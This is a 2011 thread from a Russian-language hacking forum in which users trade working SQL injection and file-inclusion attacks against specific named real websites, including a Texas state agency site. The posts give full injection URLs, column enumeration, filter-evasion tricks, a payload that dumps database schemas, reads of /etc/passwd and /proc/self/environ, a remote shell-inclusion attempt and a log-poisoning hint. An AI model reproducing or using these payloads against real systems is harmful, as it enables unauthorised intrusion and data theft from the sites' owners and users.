ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.10.2011, 20:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Boolean
Boolean said:
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)and(1=2)union(select(1),(2),( 3),(4),(5),(6),(7),(8),(9),(10),(11),(12)from(stor ies)
Как ты подобрал количество полей здесь, объясни если не трудно?
|
|
|
|
20.10.2011, 20:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от er9j6@
er9j6@ said:
Как ты подобрал количество полей здесь, объясни если не трудно?
Код:
Code:
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(10
Нет ошибки.
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(20
Есть ошибка.
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(15
Есть ошибка.
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(13
Есть ошибка.
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(12
Нет ошибки.
|
|
|
|
20.10.2011, 23:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+
|
|
|
|
20.10.2011, 23:06
|
|
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
Провел на форуме:
724939
Репутация:
108
|
|
Добрый вечер. Интересует, что можно сделать с этим сайтом. Проблема в том что я нашел лишь одну php-страничку. Даже кавычку подставить некуда. Не понятно так же, что за движок (походу самописный). Сканил структуру сайта меднет-сканнером - тоже ничего интересного.
Сообщение от None
http://marafet.net/include/ajax/modules/gallery/voteImage.php
Все что я смог это получить раскрытие путей, подпортив кукисы.
Сообщение от None
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/gambler/data/www/marafet.net/classes/modules/sys_session/Session.class.php on line 53
Буду благодарен за любую инфу, которая может помочь. |
|
|
20.10.2011, 23:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от smirk
smirk said:
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+
Можно побаловаться с IF(), но нормально ничего не вытащишь.
http://www.soldatru.ru/read.php?id=IF((SUBSTR(version(),1,1)='5'),1410,-1410)
Если правильно - покажет страницу, нет - не покажет.
регулярка на select, пробовал SeLeCT и т.п. вариации с регистром букв, не помогает.
|
|
|
|
20.10.2011, 23:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от smirk
smirk said:
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+
Так, но вывода все равно нет
http://www.soldatru.ru/read.php?id=-1410+%75%6e%69%6f%6e%0a%73%65%6c%65%63%74+1,2,3,4, 5,6,7,8,9,10,11,12,13,14+--+
|
|
|
|
20.10.2011, 23:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
В прочем, там и в поиске уязвимость вида SQL INJ.
Пробелы стр_реплейсятся на %, видимо для "улучшения" результатов поиска.
Вместо пробела юзать /**/
В поиск:
http://www.soldatru.ru/search.php
'/**/and/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),version ()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28/**/#
|
|
|
|
20.10.2011, 23:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от smirk
smirk said:
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+
это вбей в search.php
'and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),( select(null)from(information_schema.columns)where( table_schema!=0x696e666f726d6174696f6e5f736368656d 61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name))))x),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
|
|
|
|
21.10.2011, 18:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Как на сайте посмотреть содержимое директории?
http://www.enu.dk/index.php?index=http://site.com/shell.php?c=ls%20-al
команда не выполняется
allow_url_fopen - on
http://www.enu.dk/index.php?index=../phpinfo.php
|
|
|
|
21.10.2011, 19:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от er9j6@
er9j6@ said:
Как на сайте посмотреть содержимое директории?
http://www.enu.dk/index.php?index=http://site.com/shell.php?c=ls%20-al
команда не выполняется
allow_url_fopen - on
http://www.enu.dk/index.php?index=../phpinfo.php
Код:
Code:
include(includes/
Facepalm.
Это LFI, а не RFI. Local File Include.
http://www.enu.dk/index.php?index=../../../../etc/passwd
Дальше либо чекай /proc/self/environ/
/proc/self/fd/2 (вообще от 1 до 7)
Или ищи access логи. И заходи на страницу с юзерагентом по типу
В курле параметр -H
-H "User-Agent: "
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
